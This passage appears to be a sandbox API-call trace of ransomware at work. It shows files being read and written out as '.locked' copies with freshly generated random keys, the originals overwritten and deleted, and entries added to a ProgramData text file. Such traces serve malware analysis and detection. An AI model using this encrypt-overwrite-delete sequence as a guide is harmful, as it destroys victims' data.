dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0265.596] GetConsoleMode (in: hConsoleHandle=0x1f8, lpMode=0x1276ae94 | out: lpMode=0x1276ae94) returned 0 [0265.660] WriteFile (in: hFile=0x1f8, lpBuffer=0x126703c0*, nNumberOfBytesToWrite=0x35, lpNumberOfBytesWritten=0x1276ae64, lpOverlapped=0x0 | out: lpBuffer=0x126703c0*, lpNumberOfBytesWritten=0x1276ae64*=0x35, lpOverlapped=0x0) returned 1 [0265.660] CloseHandle (hObject=0x1f8) returned 1 [0265.661] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\PCqRptQW6vY1N.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\pcqrptqw6vy1n.gif")) returned 1 [0265.703] VirtualAlloc (lpAddress=0x176c0000, dwSize=0x100000, flAllocationType=0x1000, flProtect=0x4) returned 0x176c0000 [0265.707] VirtualAlloc (lpAddress=0x10bc4000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x10bc4000 [0265.727] VirtualAlloc (lpAddress=0x177c0000, dwSize=0x100000, flAllocationType=0x1000, flProtect=0x4) returned 0x177c0000 [0265.736] VirtualAlloc (lpAddress=0x10bb4000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x10bb4000 [0265.736] VirtualAlloc (lpAddress=0x216f000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x216f000 [0265.759] VirtualAlloc (lpAddress=0x178c0000, dwSize=0x100000, flAllocationType=0x1000, flProtect=0x4) returned 0x178c0000 [0265.762] VirtualAlloc (lpAddress=0x10ba4000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x10ba4000 [0265.796] VirtualAlloc (lpAddress=0x179c0000, dwSize=0x130000, flAllocationType=0x1000, flProtect=0x4) returned 0x179c0000 [0265.801] VirtualAlloc (lpAddress=0x10b90000, dwSize=0x14000, flAllocationType=0x1000, flProtect=0x4) returned 0x10b90000 [0265.829] VirtualAlloc (lpAddress=0x17af0000, dwSize=0x100000, flAllocationType=0x1000, flProtect=0x4) returned 0x17af0000 [0265.834] VirtualAlloc (lpAddress=0x10b80000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x10b80000 [0265.847] VirtualAlloc (lpAddress=0x17bf0000, dwSize=0x100000, flAllocationType=0x1000, flProtect=0x4) returned 0x17bf0000 [0265.851] VirtualAlloc (lpAddress=0x10b70000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x10b70000 [0265.865] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\PCqRptQW6vY1N.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\pcqrptqw6vy1n.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0266.003] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0266.075] GetConsoleMode (in: hConsoleHandle=0x188, lpMode=0x1276ae88 | out: lpMode=0x1276ae88) returned 0 [0266.075] WriteFile (in: hFile=0x188, lpBuffer=0x17b1e000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276ae78, lpOverlapped=0x0 | out: lpBuffer=0x17b1e000*, lpNumberOfBytesWritten=0x1276ae78*=0xfa000, lpOverlapped=0x0) returned 1 [0266.175] CloseHandle (hObject=0x188) returned 1 [0266.347] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0270.102] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0270.116] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0270.183] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0270.193] SetEvent (hEvent=0x1dc) returned 1 [0270.193] SetEvent (hEvent=0x1d0) returned 1 [0270.193] SetEvent (hEvent=0x1ac) returned 1 [0270.193] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0273.184] SetEvent (hEvent=0x14c) returned 1 [0273.184] SetEvent (hEvent=0x104) returned 1 [0273.184] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0273.253] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0273.269] SetEvent (hEvent=0x220) returned 1 [0273.269] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0273.444] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c200 | out: pbBuffer=0x1234c200) returned 1 [0273.444] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8060 | out: pbBuffer=0x124a8060) returned 1 [0273.444] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0273.445] WriteFile (in: hFile=0x218, lpBuffer=0x126c7000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1263bd78, lpOverlapped=0x0 | out: lpBuffer=0x126c7000*, lpNumberOfBytesWritten=0x1263bd78*=0x80, lpOverlapped=0x0) returned 1 [0273.448] ReadFile (in: hFile=0x1c0, lpBuffer=0x168aa000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1263bd68, lpOverlapped=0x0 | out: lpBuffer=0x168aa000*, lpNumberOfBytesRead=0x1263bd68*=0x172c9, lpOverlapped=0x0) returned 1 [0273.451] WriteFile (in: hFile=0x218, lpBuffer=0x168aa000*, nNumberOfBytesToWrite=0x172c9, lpNumberOfBytesWritten=0x1263bd74, lpOverlapped=0x0 | out: lpBuffer=0x168aa000*, lpNumberOfBytesWritten=0x1263bd74*=0x172c9, lpOverlapped=0x0) returned 1 [0273.456] ReadFile (in: hFile=0x1c0, lpBuffer=0x168aa000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1263bd68, lpOverlapped=0x0 | out: lpBuffer=0x168aa000*, lpNumberOfBytesRead=0x1263bd68*=0x0, lpOverlapped=0x0) returned 1 [0273.456] CloseHandle (hObject=0x218) returned 1 [0273.484] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0273.573] CloseHandle (hObject=0x1c0) returned 1 [0273.574] SetEvent (hEvent=0x14c) returned 1 [0273.574] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0276.313] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e160*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x123a3a24, lpReserved=0x0 | out: lpBuffer=0x1263e160*, lpNumberOfCharsWritten=0x123a3a24*=0xb) returned 1 [0276.315] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\pQ4D7olyLasPf6h0yK.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\pq4d7olylaspf6h0yk.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0276.315] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x123a3d9c | out: lpMode=0x123a3d9c) returned 0 [0276.316] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\pQ4D7olyLasPf6h0yK.flv.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\pq4d7olylaspf6h0yk.flv.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0276.357] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x123a3d9c | out: lpMode=0x123a3d9c) returned 0 [0276.358] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e180 | out: pbBuffer=0x1263e180) returned 1 [0276.358] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a80c0 | out: pbBuffer=0x124a80c0) returned 1 [0276.358] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702401 | out: pbBuffer=0x12702401) returned 1 [0276.358] WriteFile (in: hFile=0x1b0, lpBuffer=0x12737000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x123a3d78, lpOverlapped=0x0 | out: lpBuffer=0x12737000*, lpNumberOfBytesWritten=0x123a3d78*=0x80, lpOverlapped=0x0) returned 1 [0276.394] ReadFile (in: hFile=0x180, lpBuffer=0x15cee000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a3d68, lpOverlapped=0x0 | out: lpBuffer=0x15cee000*, lpNumberOfBytesRead=0x123a3d68*=0xd5cc, lpOverlapped=0x0) returned 1 [0276.396] WriteFile (in: hFile=0x1b0, lpBuffer=0x15cee000*, nNumberOfBytesToWrite=0xd5cc, lpNumberOfBytesWritten=0x123a3d74, lpOverlapped=0x0 | out: lpBuffer=0x15cee000*, lpNumberOfBytesWritten=0x123a3d74*=0xd5cc, lpOverlapped=0x0) returned 1 [0276.597] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0277.360] ReadFile (in: hFile=0x180, lpBuffer=0x15cee000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a3d68, lpOverlapped=0x0 | out: lpBuffer=0x15cee000*, lpNumberOfBytesRead=0x123a3d68*=0x0, lpOverlapped=0x0) returned 1 [0277.360] CloseHandle (hObject=0x1b0) returned 1 [0277.363] CloseHandle (hObject=0x180) returned 1 [0277.363] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0277.363] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x123a3e94 | out: lpMode=0x123a3e94) returned 0 [0277.363] WriteFile (in: hFile=0x180, lpBuffer=0x125ee0c0*, nNumberOfBytesToWrite=0x52, lpNumberOfBytesWritten=0x123a3e64, lpOverlapped=0x0 | out: lpBuffer=0x125ee0c0*, lpNumberOfBytesWritten=0x123a3e64*=0x52, lpOverlapped=0x0) returned 1 [0277.363] CloseHandle (hObject=0x180) returned 1 [0277.364] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\pQ4D7olyLasPf6h0yK.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\pq4d7olylaspf6h0yk.flv")) returned 1 [0277.392] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\pQ4D7olyLasPf6h0yK.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\pq4d7olylaspf6h0yk.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0277.393] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x123a3e88 | out: lpMode=0x123a3e88) returned 0 [0277.393] WriteFile (in: hFile=0x180, lpBuffer=0x133a0000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x123a3e78, lpOverlapped=0x0 | out: lpBuffer=0x133a0000*, lpNumberOfBytesWritten=0x123a3e78*=0xfa000, lpOverlapped=0x0) returned 1 [0277.591] CloseHandle (hObject=0x180) returned 1 [0277.869] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0278.292] SetEvent (hEvent=0x1ac) returned 1 [0278.292] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0278.370] SetEvent (hEvent=0x1b8) returned 1 [0278.370] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0278.559] SetEvent (hEvent=0x1dc) returned 1 [0278.559] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0278.727] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\ynl0nO8fmos3T.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\ynl0no8fmos3t.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0278.978] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0279.401] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x124a1e88 | out: lpMode=0x124a1e88) returned 0 [0279.401] WriteFile (in: hFile=0x218, lpBuffer=0x17d8a000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x124a1e78, lpOverlapped=0x0 | out: lpBuffer=0x17d8a000*, lpNumberOfBytesWritten=0x124a1e78*=0xfa000, lpOverlapped=0x0) returned 1 [0279.440] CloseHandle (hObject=0x218) returned 1 [0279.625] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0280.202] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\ynl0nO8fmos3T.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\ynl0no8fmos3t.mp4")) returned 1 [0280.481] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0280.879] SetEvent (hEvent=0x190) returned 1 [0280.879] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0282.063] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0282.147] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0282.207] SetEvent (hEvent=0x14c) returned 1 [0282.207] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0282.401] SetEvent (hEvent=0x198) returned 1 [0282.401] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0282.458] SetEvent (hEvent=0x20c) returned 1 [0282.458] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0282.472] SetEvent (hEvent=0x1dc) returned 1 [0282.472] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0282.655] SetEvent (hEvent=0x1ac) returned 1 [0282.656] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0283.413] SetEvent (hEvent=0x1dc) returned 1 [0283.413] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0283.564] SetEvent (hEvent=0x214) returned 1 [0283.564] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0284.483] SetEvent (hEvent=0x214) returned 1 [0284.483] SetEvent (hEvent=0x14c) returned 1 [0284.483] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0285.387] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0285.387] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x1276be94 | out: lpMode=0x1276be94) returned 0 [0285.387] WriteFile (in: hFile=0x1e0, lpBuffer=0x125ec140*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x1276be64, lpOverlapped=0x0 | out: lpBuffer=0x125ec140*, lpNumberOfBytesWritten=0x1276be64*=0x49, lpOverlapped=0x0) returned 1 [0285.388] CloseHandle (hObject=0x1e0) returned 1 [0285.389] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\7g-3nq2zvxE4VIk.png" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\7g-3nq2zvxe4vik.png")) returned 1 [0286.574] SetEvent (hEvent=0x22c) returned 1 [0286.574] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x1) returned 0x102 [0286.590] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0286.590] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x1) returned 0x102 [0286.658] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0286.658] SetEvent (hEvent=0x220) returned 1 [0286.658] SetEvent (hEvent=0x21c) returned 1 [0286.658] SetEvent (hEvent=0x190) returned 1 [0286.659] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0286.704] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x331efb34, ulCount=0x10, ulNumEntriesRemoved=0x331efb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x331efb34, ulNumEntriesRemoved=0x331efb14) returned 0 [0286.704] SetEvent (hEvent=0x150) returned 1 [0286.704] SetEvent (hEvent=0x21c) returned 1 [0286.704] SetEvent (hEvent=0x190) returned 1 [0286.704] SetEvent (hEvent=0x220) returned 1 [0286.780] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\7g-3nq2zvxE4VIk.png" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\7g-3nq2zvxe4vik.png"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0286.999] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0287.503] SetEvent (hEvent=0x150) returned 1 [0287.503] SetEvent (hEvent=0x22c) returned 1 [0287.503] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x12621e88 | out: lpMode=0x12621e88) returned 0 [0287.503] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0287.875] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0287.932] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0288.011] SetEvent (hEvent=0x190) returned 1 [0288.011] SetEvent (hEvent=0x1dc) returned 1 [0288.011] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0288.163] WriteFile (in: hFile=0x218, lpBuffer=0x1325c000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x124a2e78, lpOverlapped=0x0 | out: lpBuffer=0x1325c000*, lpNumberOfBytesWritten=0x124a2e78*=0xfa000, lpOverlapped=0x0) returned 1 [0288.234] CloseHandle (hObject=0x218) returned 1 [0288.412] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0288.616] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0288.690] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0288.783] SetEvent (hEvent=0x1dc) returned 1 [0288.783] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0288.840] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0288.874] SetEvent (hEvent=0x1dc) returned 1 [0288.875] SetEvent (hEvent=0x12c) returned 1 [0288.875] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\4R8gdYA15.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\4r8gdya15.docx")) returned 1 [0288.931] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0289.055] SetEvent (hEvent=0x20c) returned 1 [0289.056] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0289.266] WriteFile (in: hFile=0x19c, lpBuffer=0x13720000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1249fe78, lpOverlapped=0x0 | out: lpBuffer=0x13720000*, lpNumberOfBytesWritten=0x1249fe78*=0xfa000, lpOverlapped=0x0) returned 1 [0289.464] CloseHandle (hObject=0x19c) returned 1 [0289.543] SetEvent (hEvent=0x12c) returned 1 [0289.544] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0289.710] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0289.774] SetEvent (hEvent=0x1b8) returned 1 [0289.774] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0289.823] SetEvent (hEvent=0x20c) returned 1 [0289.823] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0289.834] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0x1) returned 0x102 [0290.161] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0290.161] SetEvent (hEvent=0x1dc) returned 1 [0290.161] SetEvent (hEvent=0x190) returned 1 [0290.161] SetEvent (hEvent=0x12c) returned 1 [0290.162] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0290.171] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x331efb34, ulCount=0x10, ulNumEntriesRemoved=0x331efb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x331efb34, ulNumEntriesRemoved=0x331efb14) returned 0 [0290.171] SetEvent (hEvent=0x150) returned 1 [0290.171] SetEvent (hEvent=0x190) returned 1 [0290.171] SetEvent (hEvent=0x12c) returned 1 [0290.171] SetEvent (hEvent=0x1dc) returned 1 [0290.171] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\pVnv3JR1eBRll.xls" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\pvnv3jr1ebrll.xls"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0290.393] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0290.577] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x1276ee88 | out: lpMode=0x1276ee88) returned 0 [0290.577] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0292.678] WriteFile (in: hFile=0x1c8, lpBuffer=0x1282c000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276ee78, lpOverlapped=0x0 | out: lpBuffer=0x1282c000*, lpNumberOfBytesWritten=0x1276ee78*=0xfa000, lpOverlapped=0x0) returned 1 [0292.719] CloseHandle (hObject=0x1c8) returned 1 [0292.865] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\pVnv3JR1eBRll.xls" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\pvnv3jr1ebrll.xls")) returned 1 [0292.986] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0293.063] SetEvent (hEvent=0x14c) returned 1 [0293.063] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0293.094] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0293.189] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0293.483] SetEvent (hEvent=0x190) returned 1 [0293.484] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0295.302] SetEvent (hEvent=0x104) returned 1 [0295.302] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0295.350] SetEvent (hEvent=0x104) returned 1 [0295.350] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0296.371] SetEvent (hEvent=0x190) returned 1 [0296.371] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0296.474] SetEvent (hEvent=0x190) returned 1 [0296.474] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0296.485] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x125fc0a0 | out: pbBuffer=0x125fc0a0) returned 1 [0296.485] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8070 | out: pbBuffer=0x124a8070) returned 1 [0296.485] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714001 | out: pbBuffer=0x12714001) returned 1 [0296.486] WriteFile (in: hFile=0x180, lpBuffer=0x12719000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12621d78, lpOverlapped=0x0 | out: lpBuffer=0x12719000*, lpNumberOfBytesWritten=0x12621d78*=0x80, lpOverlapped=0x0) returned 1 [0296.567] ReadFile (in: hFile=0x1bc, lpBuffer=0x147d0000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12621d68, lpOverlapped=0x0 | out: lpBuffer=0x147d0000*, lpNumberOfBytesRead=0x12621d68*=0x7809, lpOverlapped=0x0) returned 1 [0296.570] WriteFile (in: hFile=0x180, lpBuffer=0x147d0000*, nNumberOfBytesToWrite=0x7809, lpNumberOfBytesWritten=0x12621d74, lpOverlapped=0x0 | out: lpBuffer=0x147d0000*, lpNumberOfBytesWritten=0x12621d74*=0x7809, lpOverlapped=0x0) returned 1 [0296.614] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0297.391] SetEvent (hEvent=0x14c) returned 1 [0297.391] ReadFile (in: hFile=0x1bc, lpBuffer=0x147d0000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12621d68, lpOverlapped=0x0 | out: lpBuffer=0x147d0000*, lpNumberOfBytesRead=0x12621d68*=0x0, lpOverlapped=0x0) returned 1 [0297.394] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0297.983] CloseHandle (hObject=0x180) returned 1 [0298.124] CloseHandle (hObject=0x1bc) returned 1 [0298.125] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c8 [0298.339] GetConsoleMode (in: hConsoleHandle=0x1c8, lpMode=0x12621e94 | out: lpMode=0x12621e94) returned 0 [0298.339] WriteFile (in: hFile=0x1c8, lpBuffer=0x1264a200*, nNumberOfBytesToWrite=0x3b, lpNumberOfBytesWritten=0x12621e64, lpOverlapped=0x0 | out: lpBuffer=0x1264a200*, lpNumberOfBytesWritten=0x12621e64*=0x3b, lpOverlapped=0x0) returned 1 [0298.513] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0299.669] CloseHandle (hObject=0x1c8) returned 1 [0299.669] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\GPvOBFfXu_XAefB06.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\gpvobffxu_xaefb06.doc")) returned 1 [0299.837] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0299.976] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0299.977] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0300.035] SetEvent (hEvent=0x214) returned 1 [0300.035] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0300.057] SetEvent (hEvent=0x214) returned 1 [0300.057] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0300.064] SetEvent (hEvent=0x12c) returned 1 [0300.064] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0300.428] SetEvent (hEvent=0x104) returned 1 [0300.428] WaitForSingleObject (hHandle=0x134, dwMilliseconds=0xffffffff) returned 0x0 [0300.438] SetEvent (hEvent=0x12c) returned 1 